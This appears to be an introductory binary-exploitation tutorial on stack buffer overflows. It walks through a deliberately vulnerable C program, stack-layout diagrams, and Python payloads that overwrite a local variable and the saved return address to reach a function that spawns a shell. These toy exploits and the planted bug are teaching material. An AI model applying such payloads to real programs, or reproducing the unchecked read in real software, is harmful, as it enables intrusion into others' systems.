A buffer overflow is a vulnerability in which more data can be written to a buffer than it was allocated to hold, allowing an attacker to overwrite adjacent data.
The simplest and most common buffer overflow is one where the buffer is on the stack. Let’s look at an example.
#include <stdio.h>
#include <unistd.h>   /* read() */

int main() {
    int secret = 0xdeadbeef;
    char name[100] = {0};
    /* Bug: reads up to 0x100 (256) bytes into a 100-byte buffer. */
    read(0, name, 0x100);
    if (secret == 0x1337) {
        puts("Wow! Here's a secret.");
    } else {
        puts("I guess you're not cool enough to see my secret");
    }
}
There’s a tiny mistake in this program which will allow us to see the secret: name is 100 bytes (decimal), but we’re reading in up to 0x100 bytes (256 in decimal)! Let’s see how we can use this to our advantage.
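As a quick sanity check on the mismatch, the arithmetic can be spelled out in Python. The constant names here are made up for illustration and simply mirror the two numbers in the C program.

```python
BUFFER_SIZE = 100   # char name[100]
READ_SIZE = 0x100   # third argument to read(), written in hex

# Number of bytes that can land past the end of name.
overflow = READ_SIZE - BUFFER_SIZE

print(READ_SIZE)   # 256
print(overflow)    # 156
```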
If the compiler chose to lay out the stack like this:
0xffff006c: 0xf7f7f7f7 // Saved EIP
0xffff0068: 0xffff0100 // Saved EBP
0xffff0064: 0xdeadbeef // secret
...
0xffff0004: 0x0
ESP -> 0xffff0000: 0x0 // name
let’s look at what happens when we read in 0x100 bytes of ‘A’s.
The first 100 (decimal) bytes are saved properly:
0xffff006c: 0xf7f7f7f7 // Saved EIP
0xffff0068: 0xffff0100 // Saved EBP
0xffff0064: 0xdeadbeef // secret
...
0xffff0004: 0x41414141
ESP -> 0xffff0000: 0x41414141 // name
However, when the 101st byte is read in, we see an issue:
0xffff006c: 0xf7f7f7f7 // Saved EIP
0xffff0068: 0xffff0100 // Saved EBP
0xffff0064: 0xdeadbe41 // secret
...
0xffff0004: 0x41414141
ESP -> 0xffff0000: 0x41414141 // name
The least significant byte of secret has been overwritten! If we follow the next 3 bytes to be read in, we’ll see the entirety of secret is “clobbered” with our ‘A’s:
0xffff006c: 0xf7f7f7f7 // Saved EIP
0xffff0068: 0xffff0100 // Saved EBP
0xffff0064: 0x41414141 // secret
...
0xffff0004: 0x41414141
ESP -> 0xffff0000: 0x41414141 // name
The remaining 152 bytes would continue clobbering values up the stack.
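The walkthrough above can be replayed with a small model. This is only a sketch: it assumes the hypothetical frame layout from the diagrams (name, then secret, saved EBP, saved EIP), and the helper names build_frame, read_into_name and secret_of are invented for illustration. Input is clipped to the modeled frame, whereas the real read() would keep writing further up the stack.

```python
import struct

NAME_SIZE = 100  # char name[100]

def build_frame():
    """name (zeroed), then secret, saved EBP, saved EIP as little-endian 32-bit words."""
    return bytearray(NAME_SIZE) + struct.pack("<III", 0xdeadbeef, 0xffff0100, 0xf7f7f7f7)

def read_into_name(frame, data):
    """Copy data starting at name[0] with no bounds check on name, like the buggy read()."""
    n = min(len(data), len(frame))  # clip to the part of the stack we model
    frame[:n] = data[:n]

def secret_of(frame):
    """Interpret the 4 bytes right after name as a little-endian integer."""
    return struct.unpack_from("<I", frame, NAME_SIZE)[0]

frame = build_frame()
read_into_name(frame, b"A" * 100)
print(hex(secret_of(frame)))  # 0xdeadbeef (untouched)

read_into_name(frame, b"A" * 101)
print(hex(secret_of(frame)))  # 0xdeadbe41 (lowest byte overwritten)

read_into_name(frame, b"A" * 104)
print(hex(secret_of(frame)))  # 0x41414141 (fully clobbered)
```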
How can we use this to pass the seemingly impossible check in the original program? Well, if we carefully line up our input so that the bytes that overwrite secret happen to be the bytes that represent 0x1337 in little-endian, we’ll see the secret message.
A small Python one-liner (Python 2 syntax) will work nicely:
python -c "print 'A'*100 + '\x37\x13\x00\x00'"
This will fill the name buffer with 100 ‘A’s, then overwrite secret with the 32-bit little-endian encoding of 0x1337.
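The one-liner relies on Python 2’s print statement. A rough Python 3 equivalent is sketched below, using struct.pack so the little-endian byte order does not have to be written out by hand. The function name build_secret_payload is made up for illustration, and the offset of 100 assumes secret sits directly after name, as in the diagrams.

```python
import struct
import sys

def build_secret_payload():
    """100 filler bytes for name, then 0x1337 as a little-endian 32-bit integer."""
    padding = b"A" * 100
    new_secret = struct.pack("<I", 0x1337)  # b"\x37\x13\x00\x00"
    return padding + new_secret

if __name__ == "__main__":
    # Write raw bytes; print() would add a newline and may re-encode the data.
    sys.stdout.buffer.write(build_secret_payload())
```

Saved under a hypothetical name such as payload.py, its output could then be piped into the vulnerable program.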
As discussed on the stack page, the address of the instruction that the current function should return to when it is done is also saved on the stack (denoted as “Saved EIP” in the above stack diagrams). If we can overwrite this, we can control where the program jumps after main finishes running, giving us the ability to control what the program does entirely.
Usually, the end objective in binary exploitation is to get a shell (often called “popping a shell”) on the remote computer. The shell provides us with an easy way to run anything we want on the target computer.
Say that somewhere else in the program there happens to be a nice function that does this, but that we normally can’t reach:
void give_shell() {
    system("/bin/sh");
}
Well, with our buffer overflow knowledge, now we can! All we have to do is overwrite the saved EIP on the stack with the address of give_shell. Then, when main returns, it will pop that address off of the stack and jump to it, running give_shell and giving us our shell.
Assuming give_shell is at 0x08048fd0, we could use something like this (again Python 2 syntax):
python -c "print 'A'*108 + '\xd0\x8f\x04\x08'"
We send 108 ‘A’s to overwrite the 100 bytes that are allocated for name, the 4 bytes for secret, and the 4 bytes for the saved EBP. Then we simply send the little-endian form of give_shell’s address, and we would get a shell!
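The same payload can be sketched in Python 3, where the raw address bytes need to be handled as bytes rather than text. The address 0x08048fd0 is the one assumed in the text, the offset of 108 holds only for the stack layout in the diagrams (a real compiler may add padding or other protections), and the name build_ret_payload is invented for illustration.

```python
import struct
import sys

GIVE_SHELL_ADDR = 0x08048fd0  # assumed address of give_shell, taken from the text

def build_ret_payload(target=GIVE_SHELL_ADDR):
    """Fill name, secret and saved EBP, then overwrite saved EIP with target."""
    padding = b"A" * (100 + 4 + 4)         # name + secret + saved EBP = 108 bytes
    return padding + struct.pack("<I", target)  # little-endian 32-bit address

if __name__ == "__main__":
    # Emit raw bytes so values above 0x7f are not re-encoded as text.
    sys.stdout.buffer.write(build_ret_payload())
```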
This idea is extended in Return Oriented Programming.